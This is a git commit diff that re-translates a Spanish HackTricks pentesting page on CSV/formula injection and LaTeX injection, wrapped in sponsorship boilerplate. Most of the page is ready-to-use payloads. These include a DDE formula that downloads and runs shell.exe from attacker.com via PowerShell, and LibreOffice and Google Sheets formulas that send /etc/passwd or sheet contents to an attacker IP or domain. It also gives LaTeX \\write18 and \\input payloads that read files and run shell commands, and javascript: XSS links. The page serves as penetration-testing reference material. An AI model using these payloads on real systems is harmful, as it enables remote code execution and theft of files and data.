Translated ['pentesting-web/formula-csv-doc-latex-ghostscript-injection.

This commit is contained in:
Translator 2024-05-07 11:04:10 +00:00
parent 3d1e7eda69
commit 9989c4098d

View file

@ -2,13 +2,13 @@
<details>
<summary><strong>Aprende hacking en AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprende hacking en AWS desde cero hasta convertirte en un experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Otras formas de apoyar a HackTricks:
* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén el [**swag oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.
@ -16,7 +16,7 @@ Otras formas de apoyar a HackTricks:
**Grupo de Seguridad Try Hard**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
@ -26,7 +26,7 @@ Otras formas de apoyar a HackTricks:
### Información
Si tu **entrada** se está **reflejando** dentro de **archivos CSV** (o cualquier otro archivo que probablemente se abrirá en **Excel**), es posible que puedas insertar **fórmulas de Excel** que se **ejecutarán** cuando el usuario **abra el archivo** o cuando el usuario **haga clic en algún enlace** dentro de la hoja de cálculo de Excel.
Si tu **entrada** se está **reflejando** dentro de **archivos CSV** (o cualquier otro archivo que probablemente se abrirá en **Excel**), es posible que puedas insertar **fórmulas de Excel** que se **ejecutarán** cuando el usuario **abra el archivo** o cuando el usuario **haga clic en algún enlace** dentro de la hoja de Excel.
{% hint style="danger" %}
Hoy en día, **Excel alertará** (varias veces) al **usuario cuando algo se carga desde fuera de Excel** para evitar que realice acciones maliciosas. Por lo tanto, se debe aplicar un esfuerzo especial en Ingeniería Social para la carga final.
@ -47,14 +47,14 @@ DDE ("cmd";"/C calc";"!A0")A0
El siguiente ejemplo fue tomado de [https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit)
Imagina una brecha de seguridad en un sistema de Gestión de Registros de Estudiantes que es explotada a través de un ataque de inyección de CSV. La intención principal del atacante es comprometer el sistema utilizado por los profesores para gestionar los detalles de los estudiantes. El método implica que el atacante inyecte una carga maliciosa en la aplicación, específicamente ingresando fórmulas dañinas en campos destinados para los detalles de los estudiantes. El ataque se desarrolla de la siguiente manera:
Imagina una brecha de seguridad en un sistema de Gestión de Registros de Estudiantes que es explotada a través de un ataque de inyección de CSV. La intención principal del atacante es comprometer el sistema utilizado por los profesores para gestionar los detalles de los estudiantes. El método implica que el atacante inyecte un payload malicioso en la aplicación, específicamente ingresando fórmulas dañinas en campos destinados para los detalles de los estudiantes. El ataque se desarrolla de la siguiente manera:
1. **Inyección de Carga Maliciosa:**
1. **Inyección de Payload Malicioso:**
* El atacante envía un formulario de detalles de estudiante pero incluye una fórmula comúnmente utilizada en hojas de cálculo (por ejemplo, `=HYPERLINK("<enlace_malicioso>","Haz clic aquí")`).
* Esta fórmula está diseñada para crear un hipervínculo, pero apunta a un servidor malicioso controlado por el atacante.
2. **Exportación de Datos Comprometidos:**
* Los profesores, sin ser conscientes del compromiso, utilizan la funcionalidad de la aplicación para exportar los datos a un archivo CSV.
* Cuando se abre el archivo CSV, todavía contiene la carga maliciosa. Esta carga aparece como un hipervínculo clickeable en la hoja de cálculo.
* Cuando se abre el archivo CSV, todavía contiene el payload malicioso. Este payload aparece como un hipervínculo clickeable en la hoja de cálculo.
3. **Desencadenando el Ataque:**
* Un profesor hace clic en el hipervínculo, creyendo que es una parte legítima de los detalles del estudiante.
* Al hacer clic, los datos sensibles (potencialmente incluyendo detalles de la hoja de cálculo o de la computadora del profesor) son transmitidos al servidor del atacante.
@ -70,28 +70,28 @@ En configuraciones específicas o versiones antiguas de Excel, una característi
* Navega a Archivo → Opciones → Centro de Confianza → Configuración del Centro de Confianza → Contenido Externo, y habilita **Lanzamiento del Servidor de Intercambio Dinámico de Datos**.
Cuando se abre una hoja de cálculo con la carga maliciosa (y si el usuario acepta las advertencias), la carga se ejecuta. Por ejemplo, para abrir la aplicación de calculadora, la carga sería:
Cuando se abre una hoja de cálculo con el payload malicioso (y si el usuario acepta las advertencias), el payload es ejecutado. Por ejemplo, para abrir la aplicación de calculadora, el payload sería:
```markdown
`=cmd|' /C calc'!xxx`
=cmd|' /C calc'!xxx
```
Además, se pueden ejecutar comandos adicionales, como descargar y ejecutar un archivo usando PowerShell:
Además, también se pueden ejecutar comandos adicionales, como descargar y ejecutar un archivo usando PowerShell:
```bash
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```
### Inclusión Local de Archivos (LFI) en LibreOffice Calc
### Inclusión de Archivos Locales (LFI) en LibreOffice Calc
LibreOffice Calc se puede utilizar para leer archivos locales y exfiltrar datos. Aquí hay algunos métodos:
* Leer la primera línea del archivo local `/etc/passwd`: `='file:///etc/passwd'#$passwd.A1`
* Exfiltrar los datos leídos a un servidor controlado por un atacante: `=WEBSERVICE(CONCATENATE("http://<IP del atacante>:8080/",('file:///etc/passwd'#$passwd.A1)))`
* Exfiltrar más de una línea: `=WEBSERVICE(CONCATENATE("http://<IP del atacante>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* Exfiltración DNS (enviar datos leídos como consultas DNS a un servidor DNS controlado por un atacante): `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<dominio del atacante>"))`
* Leyendo la primera línea del archivo local `/etc/passwd`: `='file:///etc/passwd'#$passwd.A1`
* Exfiltrando los datos leídos a un servidor controlado por un atacante: `=WEBSERVICE(CONCATENATE("http://<IP del atacante>:8080/",('file:///etc/passwd'#$passwd.A1)))`
* Exfiltrando más de una línea: `=WEBSERVICE(CONCATENATE("http://<IP del atacante>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* Exfiltración DNS (enviando datos leídos como consultas DNS a un servidor DNS controlado por un atacante): `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<dominio del atacante>"))`
### Google Sheets para Exfiltración de Datos Out-of-Band (OOB)
Google Sheets ofrece funciones que pueden ser explotadas para la exfiltración de datos OOB:
* **CONCATENATE**: Une cadenas - `=CONCATENATE(A2:E2)`
* **CONCATENATE**: Une cadenas juntas - `=CONCATENATE(A2:E2)`
* **IMPORTXML**: Importa datos de tipos de datos estructurados - `=IMPORTXML(CONCAT("http://<IP del atacante:Puerto>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")`
* **IMPORTFEED**: Importa fuentes RSS o ATOM - `=IMPORTFEED(CONCAT("http://<IP del atacante:Puerto>//123.txt?v=", CONCATENATE(A2:E2)))`
* **IMPORTHTML**: Importa datos de tablas HTML o listas - `=IMPORTHTML (CONCAT("http://<IP del atacante:Puerto>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)`
@ -101,13 +101,13 @@ Google Sheets ofrece funciones que pueden ser explotadas para la exfiltración d
## Inyección de LaTeX
Por lo general, los servidores que se encuentran en internet y que **convierten código LaTeX a PDF** utilizan **`pdflatex`**.\
Este programa utiliza 3 atributos principales para permitir o no la ejecución de comandos:
Este programa utiliza 3 atributos principales para (des)habilitar la ejecución de comandos:
* **`--no-shell-escape`**: **Deshabilita** la construcción `\write18{comando}`, incluso si está habilitada en el archivo texmf.cnf.
* **`--shell-restricted`**: Igual que `--shell-escape`, pero **limitado** a un conjunto 'seguro' de **comandos predefinidos** (\*\*En Ubuntu 16.04 la lista está en `/usr/share/texmf/web2c/texmf.cnf`).
* **`--shell-escape`**: **Habilita** la construcción `\write18{comando}`. El comando puede ser cualquier comando de shell. Esta construcción normalmente está deshabilitada por razones de seguridad.
Sin embargo, existen otras formas de ejecutar comandos, por lo que para evitar RCE es muy importante usar `--shell-restricted`.
Sin embargo, hay otras formas de ejecutar comandos, por lo que para evitar RCE es muy importante usar `--shell-restricted`.
### Leer archivo <a href="#read-file" id="read-file"></a>
@ -127,7 +127,7 @@ Es posible que necesites ajustar la inyección con envolturas como \[ o $.
\text{\line}
\closein\file
```
#### Leer archivo con múltiples líneas
#### Leer archivo de varias líneas
```bash
\newread\file
\openin\file=/etc/passwd
@ -146,7 +146,7 @@ Es posible que necesites ajustar la inyección con envolturas como \[ o $.
```
### Ejecución de comandos <a href="#command-execution" id="command-execution"></a>
La entrada del comando se redirigirá a stdin, utilice un archivo temporal para obtenerla.
La entrada del comando será redirigida a stdin, utiliza un archivo temporal para obtenerla.
```bash
\immediate\write18{env > output}
\input{output}
@ -169,7 +169,7 @@ La entrada del comando se redirigirá a stdin, utilice un archivo temporal para
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
```
Si obtienes algún error de LaTex, considera usar base64 para obtener el resultado sin caracteres no deseados.
Si obtienes algún error de LaTex, considera usar base64 para obtener el resultado sin caracteres no válidos.
```bash
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
@ -181,7 +181,7 @@ Si obtienes algún error de LaTex, considera usar base64 para obtener el resulta
```
### Cross Site Scripting <a href="#cross-site-scripting" id="cross-site-scripting"></a>
De [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
Desde [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
```bash
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
@ -199,7 +199,7 @@ De [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
**Grupo de Seguridad Try Hard**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}